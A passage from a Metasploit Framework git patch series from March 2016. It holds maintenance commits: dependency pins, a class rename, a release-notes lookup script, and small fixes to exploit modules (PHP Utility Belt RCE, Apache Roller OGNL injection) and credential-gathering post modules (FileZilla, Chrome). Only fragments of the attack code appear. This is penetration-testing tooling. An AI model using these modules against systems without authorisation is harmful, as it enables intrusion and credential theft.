, '~> 3.3' diff --git a/Gemfile.lock b/Gemfile.lock index e2e287d4d0..8dc7a49ea3 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -237,7 +237,7 @@ GEM activesupport (= 4.1.15) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (11.0.1) + rake (10.5.0) rb-readline-r7 (0.5.2.0) recog (2.0.14) nokogiri @@ -305,7 +305,7 @@ DEPENDENCIES metasploit-yard! metasploit_data_models! pry - rake (>= 10.0.0) + rake (~> 10.5) redcarpet rspec-rails (~> 3.3) shoulda-matchers From 8953952a8f5facec742d0f004964d3e860d6c11e Mon Sep 17 00:00:00 2001 From: Jay Turla Date: Fri, 11 Mar 2016 14:05:26 +0800 Subject: [PATCH 536/686] correction for the DisclosureDate based on Exploit-DB --- modules/exploits/multi/http/php_utility_belt_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb index a6ac87ad4f..2e1a1fc046 100644 --- a/modules/exploits/multi/http/php_utility_belt_rce.rb +++ b/modules/exploits/multi/http/php_utility_belt_rce.rb @@ -30,7 +30,7 @@ class Metasploit4 < Msf::Exploit::Remote ['EDB', '38901'], ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo ], - 'DisclosureDate' => 'Aug 12 2015', + 'DisclosureDate' => 'Dec 08 2015', 'License' => MSF_LICENSE, 'Platform' => 'php', 'Arch' => ARCH_PHP, From 6f85c82dc0f7f020751c0afb194bd890c7dd93d6 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Fri, 11 Mar 2016 10:54:17 -0600 Subject: [PATCH 537/686] Fix Nexpose import to truncate long vuln names A warning is emitted since there is a potential for data loss, but since we reference vulns by their ID, the data-integrity risk is small. Initially triggered by some Nexpose data, this should probably be properly fixed by removing the length bound on the field. MS-1184 --- lib/rex/parser/nexpose_raw_nokogiri.rb | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/lib/rex/parser/nexpose_raw_nokogiri.rb b/lib/rex/parser/nexpose_raw_nokogiri.rb index 3d5ec218b1..78a681dba8 100644 --- a/lib/rex/parser/nexpose_raw_nokogiri.rb +++ b/lib/rex/parser/nexpose_raw_nokogiri.rb @@ -193,6 +193,13 @@ module Rex vuln_instances = @report_data[:vuln][:matches].size db.emit(:vuln, [refs.last,vuln_instances], &block) if block + # TODO: potential remove the size limit on this field, might require + # some additional UX + if @report_data[:vuln]['title'].length > 255 + db.emit :warning, 'Vulnerability name longer than 255 characters, truncating.', &block if block + @report_data[:vuln]['title'] = @report_data[:vuln]['title'][0..254] + end + vuln_ids = @report_data[:vuln][:matches].map{ |v| v[0] } vdet_ids = @report_data[:vuln][:matches].map{ |v| v[1] } From 8217d55e2503c5b78d9a76c71c67c1afa18fd73c Mon Sep 17 00:00:00 2001 From: James Lee Date: Fri, 11 Mar 2016 11:37:22 -0600 Subject: [PATCH 538/686] Fix display issue when SESSION is -1 --- modules/post/windows/gather/credentials/filezilla_server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 4fd3ca037e..f9c619ab45 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post end if !paths.empty? - print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") + print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{session.sid}") print_line return paths end From 1546bf32ed8e0ff36d257fbc5093d9d8ee3b6565 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 11 Mar 2016 13:44:38 -0600 Subject: [PATCH 539/686] Add a dev script to find Metasploit release notes This script allows you to find the release notes of a: * Pull request number for a bug fix, or a notable change. * A module name (preferably just use the short name) --- tools/dev/findd_release_notes.rb | 159 +++++++++++++++++++++++++++++++ 1 file changed, 159 insertions(+) create mode 100644 tools/dev/findd_release_notes.rb diff --git a/tools/dev/findd_release_notes.rb b/tools/dev/findd_release_notes.rb new file mode 100644 index 0000000000..fbd073a5ae --- /dev/null +++ b/tools/dev/findd_release_notes.rb @@ -0,0 +1,159 @@ +#!/usr/bin/env ruby + +require 'net/http' +require 'nokogiri' +require 'thread' + +module ReleaseNotesFinder + # This finds the release notes information based on either: + # 1. A PR number. In release notes, PR numbers are for bug fixes and notable changes. + # 2. A module short name. For example: ms08_067_netapi + class Client + attr_accessor :release_notes + + RELEASE_NOTES_PAGE = 'https://community.rapid7.com/docs/DOC-2918'.freeze + + def initialize + init_release_notes + @mutex = Mutex.new + end + + def add_release_notes_entry(row) + td = row.search('td') + release_notes_link = td[0] && td[0].at('a') ? td[0].at('a').attributes['href'].value : '' + release_notes_num = td[0] && td[0].at('a') ? td[0].at('a').text.scan(/\d{10}/).flatten.first || '' : '' + highlights = td[1] ? (td[1].search('span') || []).map { |e| e.text } * " " : '' + update_link = td[2] && td[2].at('a') ? td[2].at('a').attributes['href'].value : '' + + @release_notes << { + release_notes_link: release_notes_link, + release_notes_num: release_notes_num, + highlights: highlights, + update_link: update_link, + pull_requests: [], + new_modules: [] + } + end + + def init_release_notes + self.release_notes = [] + + html = send_http_request(RELEASE_NOTES_PAGE) + table_rows_pattern = 'div[@id="jive-body-main"]//div//section//div//div[@class="j-rte-table"]//table//tbody//tr' + rows = html.search(table_rows_pattern) + rows.each do |row| + add_release_notes_entry(row) + end + end + + def update_pr_list(n, text) + pr_num, desc = text.scan(/#(\d+).\x20*(.+)/).flatten + return unless pr_num + n[:pull_requests] << { id: pr_num, description: desc } + end + + def update_module_list(n, li) + li.search('a').each do |a| + next if a.attributes['href'].nil? + n[:new_modules] << { link: a.attributes['href'].value } + end + end + + def update_release_notes_entry(n) + html = send_http_request(n[:release_notes_link]) + pattern = '//div[@class="jive-rendered-content"]//ul//li' + html.search(pattern).each do |li| + @mutex.synchronize do + update_pr_list(n, li.text) + update_module_list(n, li) + end + end + end + + def get_release_notes(input) + release_notes.each do |n| + if n[:pull_requests].empty? + update_release_notes_entry(n) + end + + input_type = guess_input_type(input) + + case input_type + when :pr + m = get_release_notes_from_pr(n, input) + when :module_name + m = get_release_notes_from_module_name(n, input) + end + + return m if m + end + + nil + end + + def guess_input_type(input) + input =~ /^\d+/ ? :pr : :module_name + end + + def get_release_notes_from_module_name(n, input) + n[:new_modules].each do |m| + return n if m[:link] && m[:link].include?(input) + end + + nil + end + + def get_release_notes_from_pr(n, pr) + n[:pull_requests].each do |p| + return n if p[:id] && pr == p[:id] + end + + nil + end + + def send_http_request(uri) + url = URI.parse(uri) + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + Nokogiri::HTML(res.body) + end + end +end + +def main + inputs = [] + + ARGV.length.times { inputs << ARGV.shift } + puts "[*] Enumerating release notes..." + cli = ReleaseNotesFinder::Client.new + puts "[*] Finding release notes for items: #{inputs * ', '}" + threads = [] + begin + inputs.each do |input| + t = Thread.new do + n = cli.get_release_notes(input) + puts "\n" + + if n + puts "[*] Found release notes for: #{input}" + puts "Release Notes Number: #{n[:release_notes_num]}" + puts "Release Notes Link: #{n[:release_notes_link] || 'N/A'}" + puts "Update Link: #{n[:update_link] || 'N/A'}" + puts "Highlights:\n#{n[:highlights]}" + else + puts "[*] Unable to find release notes for: #{input}" + end + end + threads << t + end + threads.each { |t| t.join } + ensure + threads.each { |t| t.kill } + end +end + +if __FILE__ == $PROGRAM_NAME + main +end From 69de3adf7ab3c42a3b00278b022a315bba9eed22 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 11 Mar 2016 13:50:13 -0600 Subject: [PATCH 540/686] Fix a typo in the file name --- tools/dev/{findd_release_notes.rb => find_release_notes.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename tools/dev/{findd_release_notes.rb => find_release_notes.rb} (100%) diff --git a/tools/dev/findd_release_notes.rb b/tools/dev/find_release_notes.rb similarity index 100% rename from tools/dev/findd_release_notes.rb rename to tools/dev/find_release_notes.rb From 51cdb57d42dea3ff0fe899489485cfff59ed63b3 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 11 Mar 2016 15:36:44 -0600 Subject: [PATCH 541/686] Fix #6569, Add a check for USERNAME env var in enum_chrome post mod Fix #6569 Depending on the context, the USERNAME environment variable might not always be there. --- modules/post/windows/gather/enum_chrome.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index f1af882553..3ce65b5d1e 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -311,7 +311,7 @@ class Metasploit3 < Msf::Post else uid = session.sys.config.getuid print_status "Running as user '#{uid}'..." - usernames << env_vars['USERNAME'].strip + usernames << env_vars['USERNAME'].strip if env_vars['USERNAME'] end has_sqlite3 = true From e059f42094d9cfb75c4d3723f0ed1df2f854e1d5 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 11 Mar 2016 14:17:28 -0800 Subject: [PATCH 542/686] Bump version of framework to 4.11.16 --- Gemfile.lock | 5 ++++- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 71b52b47c9..9baf553c05 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.15) + metasploit-framework (4.11.16) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) @@ -246,3 +246,6 @@ DEPENDENCIES simplecov timecop yard + +BUNDLED WITH + 1.11.2 diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 291b3563ec..ed1dbf948b 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.15" + VERSION = "4.11.16" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From b22a057165479663d492cb9d832b0337e75e9d55 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 11 Mar 2016 18:48:17 -0600 Subject: [PATCH 543/686] Fix #6554, hardcoded File.open path in apache_roller_ognl_injection The hardcoded File.open path was meant for debugging purposes during development, but apparently we forgot to remove it. This line causes the exploit to be unusable on Windows platform. Fix #6554 --- modules/exploits/multi/http/apache_roller_ognl_injection.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/multi/http/apache_roller_ognl_injection.rb b/modules/exploits/multi/http/apache_roller_ognl_injection.rb index 7c34f04663..2e8099d7d6 100644 --- a/modules/exploits/multi/http/apache_roller_ognl_injection.rb +++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb @@ -87,8 +87,6 @@ class Metasploit3 < Msf::Exploit::Remote append = 'false' jar = payload.encoded_jar.pack - File.open("/tmp/#{@payload_exe}", "wb") do |f| f.write(jar) end - chunk_length = 384 # 512 bytes when base64 encoded parts = jar.chars.each_slice(chunk_length).map(&:join) From da039e136a9631deb901020d713d0cfa697c8250 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 13 Mar 2016 13:44:44 -0500 Subject: [PATCH 544/686] update test modules to use MetasploitModule --- test/modules/auxiliary/test/capture.rb | 2 +- test/modules/auxiliary/test/check.rb | 2 +- test/modules/auxiliary/test/eth_spoof.rb | 2 +- test/modules/auxiliary/test/ftp_data.rb | 2 +- test/modules/auxiliary/test/heaplib2.rb | 2 +- test/modules/auxiliary/test/httpserver.rb | 2 +- test/modules/auxiliary/test/ip_spoof.rb | 2 +- test/modules/auxiliary/test/recon_passive.rb | 2 +- test/modules/auxiliary/test/report_auth_info.rb | 2 +- test/modules/auxiliary/test/scanner_batch.rb | 2 +- test/modules/auxiliary/test/scanner_host.rb | 2 +- test/modules/auxiliary/test/scanner_range.rb | 2 +- test/modules/auxiliary/test/space-check.rb | 2 +- test/modules/exploits/test/aggressive.rb | 2 +- test/modules/exploits/test/browserexploitserver.rb | 2 +- test/modules/exploits/test/check.rb | 2 +- test/modules/exploits/test/cmdweb.rb | 2 +- test/modules/exploits/test/dialup.rb | 2 +- test/modules/exploits/test/egghunter.rb | 2 +- test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb | 2 +- test/modules/exploits/test/explib2_ie11_exec_test_case.rb | 2 +- test/modules/exploits/test/exploitme.rb | 2 +- test/modules/exploits/test/java_tester.rb | 2 +- test/modules/exploits/test/js_tester.rb | 2 +- test/modules/exploits/test/kernel.rb | 2 +- test/modules/exploits/test/shell.rb | 2 +- test/modules/post/test/extapi.rb | 2 +- test/modules/post/test/file.rb | 2 +- test/modules/post/test/get_env.rb | 2 +- test/modules/post/test/meterpreter.rb | 2 +- test/modules/post/test/railgun_reverse_lookups.rb | 2 +- test/modules/post/test/registry.rb | 2 +- test/modules/post/test/services.rb | 2 +- test/modules/post/test/unix.rb | 2 +- 34 files changed, 34 insertions(+), 34 deletions(-) diff --git a/test/modules/auxiliary/test/capture.rb b/test/modules/auxiliary/test/capture.rb index 4e05e343fc..7635dd4e0c 100644 --- a/test/modules/auxiliary/test/capture.rb +++ b/test/modules/auxiliary/test/capture.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/test/modules/auxiliary/test/check.rb b/test/modules/auxiliary/test/check.rb index dbcb353284..09138e7dcb 100644 --- a/test/modules/auxiliary/test/check.rb +++ b/test/modules/auxiliary/test/check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/test/modules/auxiliary/test/eth_spoof.rb b/test/modules/auxiliary/test/eth_spoof.rb index 087adf1282..c20f1d5ffe 100644 --- a/test/modules/auxiliary/test/eth_spoof.rb +++ b/test/modules/auxiliary/test/eth_spoof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/test/modules/auxiliary/test/ftp_data.rb b/test/modules/auxiliary/test/ftp_data.rb index 8f22c67c49..d0b28c0421 100644 --- a/test/modules/auxiliary/test/ftp_data.rb +++ b/test/modules/auxiliary/test/ftp_data.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp diff --git a/test/modules/auxiliary/test/heaplib2.rb b/test/modules/auxiliary/test/heaplib2.rb index d50c432964..c1e9a0cbae 100644 --- a/test/modules/auxiliary/test/heaplib2.rb +++ b/test/modules/auxiliary/test/heaplib2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/test/modules/auxiliary/test/httpserver.rb b/test/modules/auxiliary/test/httpserver.rb index 8fc667d5c4..2da0069f68 100644 --- a/test/modules/auxiliary/test/httpserver.rb +++ b/test/modules/auxiliary/test/httpserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/test/modules/auxiliary/test/ip_spoof.rb b/test/modules/auxiliary/test/ip_spoof.rb index 50dc2f8ef4..dcb670d582 100644 --- a/test/modules/auxiliary/test/ip_spoof.rb +++ b/test/modules/auxiliary/test/ip_spoof.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/recon_passive.rb b/test/modules/auxiliary/test/recon_passive.rb index dfd7a23b8e..11ec7c313b 100644 --- a/test/modules/auxiliary/test/recon_passive.rb +++ b/test/modules/auxiliary/test/recon_passive.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb index 256f549059..f93e01cc95 100644 --- a/test/modules/auxiliary/test/report_auth_info.rb +++ b/test/modules/auxiliary/test/report_auth_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary FAKE_IP = '192.168.12.123' FAKE_PORT = 80 diff --git a/test/modules/auxiliary/test/scanner_batch.rb b/test/modules/auxiliary/test/scanner_batch.rb index d9e8a346d7..120b02783b 100644 --- a/test/modules/auxiliary/test/scanner_batch.rb +++ b/test/modules/auxiliary/test/scanner_batch.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/scanner_host.rb b/test/modules/auxiliary/test/scanner_host.rb index 2f9ff8475e..4ff7dd85b2 100644 --- a/test/modules/auxiliary/test/scanner_host.rb +++ b/test/modules/auxiliary/test/scanner_host.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/scanner_range.rb b/test/modules/auxiliary/test/scanner_range.rb index 76210a771d..9c3f192320 100644 --- a/test/modules/auxiliary/test/scanner_range.rb +++ b/test/modules/auxiliary/test/scanner_range.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner diff --git a/test/modules/auxiliary/test/space-check.rb b/test/modules/auxiliary/test/space-check.rb index fea0b6870b..aaa7ae5f5a 100644 --- a/test/modules/auxiliary/test/space-check.rb +++ b/test/modules/auxiliary/test/space-check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/test/modules/exploits/test/aggressive.rb b/test/modules/exploits/test/aggressive.rb index 293301faa3..f989bac288 100644 --- a/test/modules/exploits/test/aggressive.rb +++ b/test/modules/exploits/test/aggressive.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb index dc38645d7a..1ccd6ffadf 100644 --- a/test/modules/exploits/test/browserexploitserver.rb +++ b/test/modules/exploits/test/browserexploitserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/check.rb b/test/modules/exploits/test/check.rb index 2b2aaf2ab5..5520014680 100644 --- a/test/modules/exploits/test/check.rb +++ b/test/modules/exploits/test/check.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit +class MetasploitModule < Msf::Exploit def initialize(info = {}) super(update_info(info, diff --git a/test/modules/exploits/test/cmdweb.rb b/test/modules/exploits/test/cmdweb.rb index ecf80239cb..22cd334e90 100644 --- a/test/modules/exploits/test/cmdweb.rb +++ b/test/modules/exploits/test/cmdweb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred diff --git a/test/modules/exploits/test/dialup.rb b/test/modules/exploits/test/dialup.rb index c5a662edd2..edd7a228ee 100644 --- a/test/modules/exploits/test/dialup.rb +++ b/test/modules/exploits/test/dialup.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Dialup diff --git a/test/modules/exploits/test/egghunter.rb b/test/modules/exploits/test/egghunter.rb index 7c4ca444c6..6da35c4bcf 100644 --- a/test/modules/exploits/test/egghunter.rb +++ b/test/modules/exploits/test/egghunter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb index dd92b9309c..8505eaa529 100644 --- a/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb +++ b/test/modules/exploits/test/explib2_ie11_drop_exec_test_case.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb index 9ac473a9c4..2715bd6a15 100644 --- a/test/modules/exploits/test/explib2_ie11_exec_test_case.rb +++ b/test/modules/exploits/test/explib2_ie11_exec_test_case.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/test/modules/exploits/test/exploitme.rb b/test/modules/exploits/test/exploitme.rb index 7a728b1a1b..f07278feeb 100644 --- a/test/modules/exploits/test/exploitme.rb +++ b/test/modules/exploits/test/exploitme.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/exploits/test/java_tester.rb b/test/modules/exploits/test/java_tester.rb index 654901ffc2..ae1602c66f 100644 --- a/test/modules/exploits/test/java_tester.rb +++ b/test/modules/exploits/test/java_tester.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking def initialize( info = {} ) diff --git a/test/modules/exploits/test/js_tester.rb b/test/modules/exploits/test/js_tester.rb index 3483c27d10..e264e61b45 100644 --- a/test/modules/exploits/test/js_tester.rb +++ b/test/modules/exploits/test/js_tester.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/test/modules/exploits/test/kernel.rb b/test/modules/exploits/test/kernel.rb index 5ca63ed3a4..1848e44631 100644 --- a/test/modules/exploits/test/kernel.rb +++ b/test/modules/exploits/test/kernel.rb @@ -8,7 +8,7 @@ require 'msf/core' # # This is a test exploit for testing kernel-mode payloads. # -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Udp diff --git a/test/modules/exploits/test/shell.rb b/test/modules/exploits/test/shell.rb index a961d3cbf8..237a48b484 100644 --- a/test/modules/exploits/test/shell.rb +++ b/test/modules/exploits/test/shell.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/test/modules/post/test/extapi.rb b/test/modules/post/test/extapi.rb index 3323bc8ad6..0b25fb123d 100644 --- a/test/modules/post/test/extapi.rb +++ b/test/modules/post/test/extapi.rb @@ -6,7 +6,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/file.rb b/test/modules/post/test/file.rb index 798b183b99..e38a99d1ac 100644 --- a/test/modules/post/test/file.rb +++ b/test/modules/post/test/file.rb @@ -8,7 +8,7 @@ require 'module_test' #load 'lib/rex/text.rb' #load 'lib/msf/core/post/file.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Common diff --git a/test/modules/post/test/get_env.rb b/test/modules/post/test/get_env.rb index 32dcb9376f..c70d61de96 100644 --- a/test/modules/post/test/get_env.rb +++ b/test/modules/post/test/get_env.rb @@ -7,7 +7,7 @@ require 'module_test' #load 'lib/rex/text.rb' #load 'lib/msf/core/post/common.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Common diff --git a/test/modules/post/test/meterpreter.rb b/test/modules/post/test/meterpreter.rb index 005725c3cc..a4a8d5c95e 100644 --- a/test/modules/post/test/meterpreter.rb +++ b/test/modules/post/test/meterpreter.rb @@ -6,7 +6,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/railgun_reverse_lookups.rb b/test/modules/post/test/railgun_reverse_lookups.rb index 7b2c1f6daa..be93bd2809 100644 --- a/test/modules/post/test/railgun_reverse_lookups.rb +++ b/test/modules/post/test/railgun_reverse_lookups.rb @@ -12,7 +12,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Windows::Railgun diff --git a/test/modules/post/test/registry.rb b/test/modules/post/test/registry.rb index 89bf6415e6..a5b4f35985 100644 --- a/test/modules/post/test/registry.rb +++ b/test/modules/post/test/registry.rb @@ -12,7 +12,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Windows::Registry diff --git a/test/modules/post/test/services.rb b/test/modules/post/test/services.rb index d5c9c9dff5..0a4531f076 100644 --- a/test/modules/post/test/services.rb +++ b/test/modules/post/test/services.rb @@ -10,7 +10,7 @@ lib = File.join(Msf::Config.install_root, "test", "lib") $:.push(lib) unless $:.include?(lib) require 'module_test' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Services include Msf::ModuleTest::PostTest diff --git a/test/modules/post/test/unix.rb b/test/modules/post/test/unix.rb index e862a388d8..95560225c1 100644 --- a/test/modules/post/test/unix.rb +++ b/test/modules/post/test/unix.rb @@ -9,7 +9,7 @@ require 'module_test' #load 'lib/msf/core/post/linux/system.rb' #load 'lib/msf/core/post/unix/enum_user_dirs.rb' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::ModuleTest::PostTest include Msf::Post::Linux::System From 23eeb76294dbb920bf47c7a2b41ef92baf33acfc Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 13 Mar 2016 13:59:47 -0500 Subject: [PATCH 545/686] update php_utility_belt_rce to use MetasploitModule --- modules/exploits/multi/http/php_utility_belt_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb index 2e1a1fc046..9f499e41a3 100644 --- a/modules/exploits/multi/http/php_utility_belt_rce.rb +++ b/modules/exploits/multi/http/php_utility_belt_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking From 4f09246c7838bfa2059dea0b1b4294b28f5af0a0 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 13 Mar 2016 20:04:05 +0100 Subject: [PATCH 546/686] reenable module loader warnings --- lib/msf/core/modules/loader/base.rb | 5 ++--- modules/exploits/multi/http/php_utility_belt_rce.rb | 2 +- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 3e1a7845c3..3ed5bb8c21 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -147,11 +147,10 @@ class Msf::Modules::Loader::Base if namespace_module.const_defined?('Metasploit3', false) klass = namespace_module.const_get('Metasploit3', false) - # We are not quite yet ready for the warnings to bubble to the user - # load_warning(module_path, 'Please change the modules class name from Metasploit3 to MetasploitModule') + load_warning(module_path, 'Please change the modules class name from Metasploit3 to MetasploitModule') elsif namespace_module.const_defined?('Metasploit4', false) klass = namespace_module.const_get('Metasploit4', false) - # load_warning(module_path, 'Please change the modules class name from Metasploit4 to MetasploitModule') + 